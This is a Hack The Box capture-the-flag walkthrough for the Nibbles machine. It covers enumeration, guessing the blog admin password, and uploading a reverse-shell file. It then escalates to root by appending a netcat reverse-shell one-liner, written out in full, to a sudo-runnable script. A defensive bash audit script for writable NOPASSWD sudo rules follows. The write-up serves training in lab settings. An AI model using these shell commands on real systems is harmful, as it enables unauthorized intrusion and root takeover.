Hi, in this post I will explain how to solve Nibbles on Hack The Box.
We are asked to get the user flag and the root flag.
To find the flags we first need to scan the target machine.
A good way to start investigating a target is to run nmap against it.
Enumeration
So, let's run nmap against the target IP.
nmap -sC -sV 10.129.178.196
The result shows that ports 22 (SSH) and 80 (HTTP) are open.
Since port 80 is open, let's see what the website looks like.
Ok, not much information.
How about the page source?
There is an HTML comment inviting us to /nibbleblog/👻
Let's check the /nibbleblog/ page for more useful information.
It is the main page of the blog. Nibbles Yum yum.
I've looked around the blog, but I couldn't find any useful information.
Time for another useful tool: gobuster.
I run gobuster to brute-force directories under the blog.
gobuster dir -u http://10.129.178.196/nibbleblog -w /usr/share/wordlists/dirb/common.txt
This turns up some interesting results, such as
admin, admin.php, content, languages, README.
For example, /README reveals the version of Nibbleblog.
That version is useful for searching for known exploits against it.
Another hint from the directories is that a username for the login is exposed.
It looks like the default username is in use.
So the other piece we need for the login is the password. However, I couldn't find it exposed anywhere.
Let's go to the /admin.php page revealed by gobuster and try guessing the password.
Since the username is the default, I first tried passwords that feel like defaults:
admin, password, admin1234 ...
All failed. So I tried random words that caught my eye on the site.
When I tried nibbles, I could log in. In hindsight, CeWL would have been the clever choice here, because it generates a wordlist from the words that appear on the website. A site-derived list also keeps the number of guesses small, which matters whenever a login form might lock accounts.
Reverse shell
Ok, I managed to log in as admin.
Next I want a shell on the box so I can go after the flags, our original mission.
Since it is a blog, there are probably places where we can upload scripts or files.
And yes, the My image plugin lets us upload files.
Next we need a script file that opens a reverse shell back to our machine when the server executes it.
I made such a file with the connect-back script inside.
After uploading it through the plugin, we can confirm it landed under the content directory.
Start a netcat listener on your machine, then open the uploaded file in the browser.
The connection comes in and we are on the box as nibbler.
The user.txt flag is in the user's home directory.
Privilege escalation
That's one mission out of two cleared.
Let's continue with the root flag.
nibbler has limited privileges, so the root flag can't be read directly.
We need to get root.
We can start with sudo -l. It lists the commands this user may run through sudo and whether a password is required.
And there it is: nibbler may run /home/nibbler/personal/stuff/monitor.sh as root.
It doesn't even ask for a password. Sweet.
Let's look at monitor.sh to see whether we can use it.
As the file name suggests, it is a monitoring script.
Since the file sits in nibbler's home directory and we can write to it, we can append one line that opens another reverse shell; anything we add runs as root when the script is run through sudo.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 8443 >/tmp/f' | tee -a monitor.sh
This time the reverse shell will connect on port 8443. The command above appends to monitor.sh in the current directory, so run it from /home/nibbler/personal/stuff or give the full path.
Start listening on port 8443 on our machine, then trigger the reverse shell by running monitor.sh through sudo, which executes it as root:
sudo /home/nibbler/personal/stuff/monitor.sh
Boom, we are root!
Now we can access /root and read root.txt.
Yay! Mission completed🎉
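The weakness behind this escalation is a NOPASSWD sudo rule pointing at a script the user can edit. As an added example that is not from the original post, the shell script below automates that check: it parses sudo -l output for NOPASSWD rules and reports any target whose file, or whose parent directory, is writable by the current user. The sudo -l text and the scratch copy of the monitor.sh layout are constructed for the demo, and the /opt/does-not-exist entries are made-up negative cases.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: spot the weakness behind this
# privilege escalation, a NOPASSWD sudo rule whose target the user can edit.
# Feed it `sudo -l` output; it prints every NOPASSWD target the current user
# could modify (writable file, or writable parent directory so the file can
# be replaced). SUDO_L_OUTPUT below is constructed sample text in the shape
# sudo -l prints; on a real box use: audit_sudo_rules "$(sudo -l 2>/dev/null)"

# nopasswd_targets: read sudo -l text on stdin, print one command path per
# line for every NOPASSWD rule (a rule may list several commands, comma-separated).
nopasswd_targets() {
    awk '/NOPASSWD:/ {
            sub(/.*NOPASSWD:[ \t]*/, "")          # drop "(root) NOPASSWD:"
            n = split($0, cmds, /,[ \t]*/)        # one entry per command
            for (i = 1; i <= n; i++) {
                split(cmds[i], parts, /[ \t]+/)   # keep the path, drop arguments
                if (parts[1] != "") print parts[1]
            }
         }'
}

# writable_targets: read paths on stdin, print the ones the current user can
# modify, tab-separated from the reason.
writable_targets() {
    local p dir
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        dir="$(dirname "$p")"
        if [ -w "$p" ]; then
            printf '%s\tfile is writable\n' "$p"
        elif [ -w "$dir" ]; then
            printf '%s\tparent directory is writable, file can be replaced\n' "$p"
        fi
    done
}

# audit_sudo_rules SUDO_L_TEXT: run the pipeline; prints findings and returns
# 0 if at least one modifiable NOPASSWD target exists, 1 otherwise.
audit_sudo_rules() {
    local found
    found="$(printf '%s\n' "$1" | nopasswd_targets | writable_targets)"
    [ -n "$found" ] || return 1
    printf '%s\n' "$found"
}

# --- constructed demo: recreate the box's file layout in a scratch directory ---
demo_dir="$(mktemp -d)"
trap 'rm -rf "$demo_dir"' EXIT
mkdir -p "$demo_dir/home/nibbler/personal/stuff"
printf '#!/bin/bash\n# monitoring script\n' > "$demo_dir/home/nibbler/personal/stuff/monitor.sh"

# Constructed sudo -l output: the real rule from the box (under the scratch
# prefix) plus two made-up targets in a directory that does not exist.
SUDO_L_OUTPUT="User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: $demo_dir/home/nibbler/personal/stuff/monitor.sh
    (root) NOPASSWD: /opt/does-not-exist/backup.sh, /opt/does-not-exist/cleanup.sh"

if audit_sudo_rules "$SUDO_L_OUTPUT"; then
    echo "modifiable NOPASSWD target(s) found: append a payload and run it through sudo"
else
    echo "no modifiable NOPASSWD targets"
fi
```

The same check works from the defender's side: any path it reports should be moved to a root-owned, non-writable location before it is allowed in sudoers, since sudo trusts the file's content, not its name.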